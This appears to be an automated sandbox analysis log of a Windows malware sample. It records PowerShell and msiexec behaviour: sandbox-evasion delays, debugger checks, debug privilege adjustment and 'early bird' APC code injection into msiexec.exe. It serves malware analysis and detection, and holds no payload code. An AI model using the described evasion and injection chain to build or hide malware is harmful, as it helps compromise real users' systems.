Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5891			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3780			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5732	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3500	Thread sleep time: -190000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004055D5
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_00406089 FindFirstFileW,FindClose,	0_2_00406089
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	API call chain: ExitProcess graph end node			graph_0-3121
Source: C:\Users\user\Desktop\ro7eoySJ9q.exe	API call chain: ExitProcess graph end node			graph_0-3127

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0498F520 LdrInitializeThunk,LdrInitializeThunk,

2_2_0498F520

Source: C:\Users\user\Desktop\ro7eoySJ9q.exe

Code function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004060B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
